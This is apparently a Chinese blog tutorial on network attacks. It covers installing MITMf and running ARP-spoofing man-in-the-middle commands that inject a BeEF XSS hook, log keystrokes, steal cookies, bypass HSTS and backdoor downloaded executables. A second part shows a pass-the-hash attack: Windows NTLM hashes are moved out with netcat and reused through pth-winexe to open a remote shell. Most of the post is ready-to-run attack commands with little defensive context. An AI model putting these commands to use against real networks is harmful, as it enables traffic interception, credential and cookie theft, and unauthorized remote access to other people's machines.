MITM 中间人攻击

1. mitmf

注入xss

即使没有XSS漏洞,也可以凌空向每个HTTP请求中注入XSS攻击代码

如果中间人发生在运营商线路上,很难引起用户注意

曾经号称最好用的中间人攻击工具

安装依赖

apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file

安装virtualenvwrapper

pip install virtualenvwrapper

编译virtualenvwrapper.sh

cd /usr/local/bin

ls

source virtualenvwrapper.sh

注意! virtualenvwrapper.sh脚本的位置取决于你的Linux版本,而不是相同的位置,你可以使用命令: find / -name virtualenvwrapper.sh -print 来查找该文件所在具体位置。

创建你的python独立运行环境 virtualenv

mkvirtualenv MITMf -p /usr/bin/python2.7

clone MITMf仓库

git clone https://github.com/byt3bl33d3r/MITMf

进入目录,并且进行初始化

cd MITMf && git submodule init && git submodule update –recursive

安装依赖

pip install -r requirements.txt

注意: 而且由于依赖很多,安装过程会很漫长,不要中途关机或者网络连接断开。

OK!安装完成,查看一下帮助

python mitmf.py –help

注意注意注意!!!,我们创建的python独立运行环境 virtualenv,一定要首先进入这个独立运行环境中,再来运行MITMF,命令为:

source /root/.virtualenvs/MITMf/bin/activate # 进入virtualenv

deactivate # 退出环境

这样,我们就可以正常使用 mitmf 了。

启动beef

cd /usr/share/beef-xss/

./beef

mitmf 中间人注入xss脚本

# 作为中间人连接网页并插入 js

root@kali:~# cd MITMf

root@kali:~/MITMf# python mitmf.py –spoof –arp -i eth0 –gateway 192.168.199.1 –target 192.168.199.116 –inject –js-url http://192.168.199.112:3000/hook.js

浏览的网页已经被注入了xss code了!!!

键盘记录器

# 键盘记录器 –jskeylogger

root@kali:~/MITMf# python mitmf.py –spoof –arp -i eth0 –gateway 192.168.199.1 –target 192.168.199.116 –jskeylogger

其他模块

# 图片翻转:–upsidedownternet

# 屏幕截图:–screen(/var/log/mitmf)

root@kali:~/MITMf# python mitmf.py –spoof –arp -i eth0 –gateway 192.168.199.1 –target 192.168.199.116 –upsidedownternet

# cookie:–ferretng(cookie) 抓取cookie

root@kali:~/MITMf# python mitmf.py –spoof –arp -i eth0 –gateway 192.168.199.1 –target 192.168.199.116 –ferretng

# 浏览器及插件信息: –browserprofiler

# smb:–smbtrap、–smbauth

旁路 –hsts

HTTP Strict Transport Security

防止协议降级、cookie窃取

安全策略通过HTTP响应头 “Strict-Transport-Security“实施

限制 user-agent、https 等

凌空插后门 –filepwn

用户下载的可执行程序在经过代理的时候,会被插入后门

其他欺骗

ICMP

-M icmp:00:11:22:33:44:55/10.0.0.1(真实网关的MAC/IP)

DHCP

−M dhcp:192.168.0.30,35,50−60/255.255.255.0/192.168.0.1(DNS)

Port

-M port /1.1.1.1/ /1.1.1.2/

Ndp

-M ndp //fe80::260d:afff:fe6e:f378/ //2001:db8::2:1/

2. Pass the Hash (PTH)

简介

密码破解耗费时间资源巨大

使用密文提交给服务器直接完成身份认证

NTLM/LM是没有加盐的静态HASH密文

企业中使用ghost等工具克隆安装系统

pth-winexe -U w7%aad3b435b51404eeaad3b435b51404ee:ed1bfaeb3063 716ab7fe2a11faf126d8 //1.1.1.1 cmd

获取 win7 HASH 值

使用 kali live iso 登录win7

nc 传输

kali:nc -nvlp 333

win7:nc 192.168.199.116 333

结果:John:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::

kali 使用 密文直接登录

root@kali:~# pth-winexe -U John%aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4 //192.168.199.116 cmd

posted @ 2019-08-11 14:31  micr067  阅读(203)  评论(0编辑  收藏  举报